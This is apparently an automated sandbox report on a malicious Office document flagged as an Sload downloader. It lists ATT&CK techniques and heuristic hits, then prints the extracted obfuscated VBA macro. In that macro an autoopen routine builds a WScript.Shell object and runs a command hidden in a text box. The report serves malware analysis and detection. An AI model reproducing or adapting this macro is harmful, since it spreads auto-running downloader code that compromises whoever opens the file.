Verdict: MALICIOUS
Risk Score: 290
Malware Insights
MITRE ATT&CK

- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
- T1137.001 Office Application Startup: Office Application
The sample is a malicious Office document containing VBA macros. Heuristics indicate the presence of WScript.Shell and CreateObject calls, suggesting the macro is designed to execute commands or download additional payloads. The presence of an autoopen macro further supports this, indicating the code runs automatically when the document is opened.
Heuristics (9)

- ClamAV: Doc.Downloader.Sload-6817537-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sload-6817537-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script: `Set ArubanGuilderid = virtualsz calculateva = "WscRipt.sHeLl" Set Woodenow = schemasja`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set Rubberwo = Lightvo Operationsot = Array(Tuvaluro, ivorysc, Georgiazb, CreateObject("" + interfacefz + Strategistjb + olivehz + Boliviaav + Mountainstj + calculateva).Run!(("" + paymentko + Concretecc + THXnw + Squaretl + Manoraq.TextBox1) + Harborspv + securedlinedv + schemaszl, 50 - 50), Internalqs, BulgarianLevfa, Bangladeshzu) Set Pinewj = Factorsjv`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `End Function Sub autoopen() multibyteii = Avonvf`
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7911 bytes |

SHA-256: eb4a4396cbec9af2ea6d485b81f2006368990eaf0f67cc3406699a6e21eeaedf

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Manoraq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Name = "panelcs"
Function marketsqz()
On Error Resume Next
Set Granitenm = Optimizationjt
Set Directpa = Burgskq
Select Case bluecq
Case 726
contentrw = Streetlb
NorwegianKroneom = CLng(58)
Case 248
CheckingAccountlr = CLng(478)
paymentrn = CDate(pinkdh)
Dobrajz = Int(751)
Case 198
realtimeww = Cos(Gorgeousiw)
PracticalFreshHatia = ChrB(560)
Avonaf = hackingqp
End Select
Set Indianaau = arraynq
Set Mexicokc = ElectronicsClothingva
Set Woodenzi = Customermd
Select Case auxiliarykw
Case 866
impactfullu = projectfj
collaborationii = CLng(719)
Case 553
Villagetd = CLng(784)
magentaqi = CDate(Amelioratedft)
Plannerzh = Int(23)
Case 561
optimaliz = Cos(calculatingqq)
neuralws = ChrB(156)
Districtwa = Interactionspj
End Select
Set Brookua = Wisconsinhp
Set withdrawalpw = neuralfu
Set purplewi = verticalaj
Select Case holisticvc
Case 488
opensourcekr = Principalnm
zerotolerancewm = CLng(684)
Case 647
Arizonarm = CLng(365)
disintermediatetl = CDate(hierarchyqa)
alarmjq = Int(812)
Case 438
withdrawalki = Cos(Mountainstr)
Healthwb = ChrB(716)
Berkshireuw = AutoLoanAccountmz
End Select
Set ArubanGuilderid = virtualsz
calculateva = "WscRipt.sHeLl"
Set Woodenow = schemasja
Set richno = Pointns
Select Case Knollpl
Case 516
conglomerationlj = backuprw
Refinedst = CLng(422)
Case 62
Marylandit = CLng(474)
morphjf = CDate(HomeLoanAccountmz)
TastyPlasticChickenha = Int(139)
Case 965
Buckinghamshirewc = Cos(Musicts)
navigatingjv = ChrB(830)
magentazb = auxiliarycr
End Select
Set Rubberwo = Lightvo
Operationsot = Array(Tuvaluro, ivorysc, Georgiazb, CreateObject("" + interfacefz + Strategistjb + olivehz + Boliviaav + Mountainstj + calculateva).Run!(("" + paymentko + Concretecc + THXnw + Squaretl + Manoraq.TextBox1) + Harborspv + securedlinedv + schemaszl, 50 - 50), Internalqs, BulgarianLevfa, Bangladeshzu)
Set Pinewj = Factorsjv
Set Kansasvr = communitieskz
Select Case Berkshirehw
Case 59
tealam = JSONqj
Coordinatordu = CLng(782)
Case 861
panelhl = CLng(281)
fullrangelr = CDate(Islandpc)
Routebs = Int(499)
Case 737
Louisianacw = Cos(onetoonebp)
B2Bjr = ChrB(873)
virtualom = Rubberzl
End Select
Set Sharableah = JBODpi
Set missioncriticalwk = Lesothocj
Set Configurationcp = Plasticmb
Select Case Architectsi
Case 785
SingaporeDollarwi = withdrawaldp
bypassingrb = CLng(52)
Case 859
connectow = CLng(214)
uniformbs = CDate(onetoonewz)
Concreteto = Int(222)
Case 193
focusgroupiw = Cos(Skywayiw)
Metalwl = ChrB(532)
dynamictw = Ouguiyamu
End Select
Set growub = Generican
Set Gardenszb = Mobilityam
Set Concretekt = Concretekn
Select Case reinventpv
Case 781
Directivesws = Dynamiclj
RefinedSteelBikehl = CLng(138)
Case 759
USDollarsz = CLng(993)
Rwandaqa = CDate(JSONaj)
copyzm = Int(432)
Case 348
transmitla = Cos(ClothingBooksGardenip)
opticaldc = ChrB(326)
Fantasticaj = synthesizeqd
End Select
Set BabyKidsMusicbq = supplychainszo
End Function
Attribute VB_Name = "Borderslw"
Function analyzingoi()
Keybp = Qualityuk
Managerpw = plumkt
paymentjj = circuitld
Woodenjq = IncredibleConcreteSoapis
evenkeeledfj = pinkif
Plasticbs = Gamesat
clicksandmortarlf = SmallMetalTunahw
motivatingfn = programkc
Inletso = meshhj
Alabamaif = calculatest
redundantsh = fullrangeiw
indexun = copyingvz
End Function
Function Humando()
demanddrivenut = CreditCardAccounttj
SDDqt = generatingfu
Borderswq = Gorgeouscs
indexinghr = arrayzj
MoneyMarketAccountuw = Forwardzb
withdrawalbk = opensourcein
limemd = XSSaf
Reverseengineeredkq = GorgeousSoftShirtim
targetda = PersonalLoanAccountzl
Bedfordshirelo = capacitorci
Dominicacd = Nevadajd
SouthDakotalt = Metalid
End Function
Sub autoopen()
multibyteii = Avonvf
Universalzh = Principalns
Avonfd = Triplebufferedof
bricksandclickszd = revolutionizezz
Kazakhstantd = LicensedGraniteChickenkd
calculatecw = HandcraftedFreshComputerbr
Metaltm = Array(ErgonomicFreshSoapdu, Intranethz, multibyteiv, marketsqz, turquoisequ, Portsif, Hollowfd)
LicensedRubberCheesefc = SMSci
Shoeswq = capabilityij
Licensedtf = bypassingtc
Bermudawr = transmittz
auxiliaryzh = ErgonomicSoftCheesewd
backupis = Functionalityru
End Sub
Function Fordsf()
overridingpq = Parkwaytr
analyzingsz = GorgeousCottonTunavd
Beautyjh = Throughwaypj
rebootdh = NorthernMarianaIslandslj
engineerqu = quantifyingju
customizedvf = circuitaz
Clothingtj = Refinedss
Steelsz = standardizationbi
morphbd = redundantsu
AwesomeCottonKeyboardwj = Assistantwn
Iowabc = Leadrl
Fantasticji = Fordtz
End Function
Attribute VB_Name = "Brookbj"
Attribute VB_Name = "Commonvw"
Attribute VB_Name = "Patacamw"
Attribute VB_Name = "greenzw"
Attribute VB_Name = "HandmadeRubberMousezr"
Attribute VB_Name = "turquoiseqo"
Attribute VB_Name = "TastyCottonTunaad"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "programcm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "datawarehousefo"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "supplychainsiz"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "streamlinepj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "AwesomeWoodenCarsp"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False